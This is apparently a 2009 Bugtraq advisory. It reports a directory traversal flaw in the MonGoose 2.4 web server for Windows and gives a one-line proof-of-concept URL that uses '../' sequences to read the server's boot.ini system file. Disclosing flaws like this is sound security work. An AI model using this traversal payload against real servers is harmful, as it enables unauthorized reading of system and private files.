
Date: 13 Apr 2009 23:18:16 -0000
From: ew1zz@...mail.com
To: bugtraq@...urityfocus.com
Subject: MonGoose 2.4 Directory Traversal Vulnerability

######### MonGoose 2.4 (win) webserver Directory Traversal  #########



######By:  e.wiZz!

######Site: www.balcansecurity.com



Found with ServMeNot (world's sexiest fuzzer :P)




In the wild...

#########################################################################################

[Info]: Easy to use web server for Windows and UNIX. Mongoose provides simple and clean API
 for embedding it into existing programs. Targeting Web application developers, embedded system developers,
 and people who need to setup file sharing quickly.

[Site]: http://code.google.com/p/mongoose/


[Vulnerability]:  

http://[localhost]/../../../../../../boot.ini

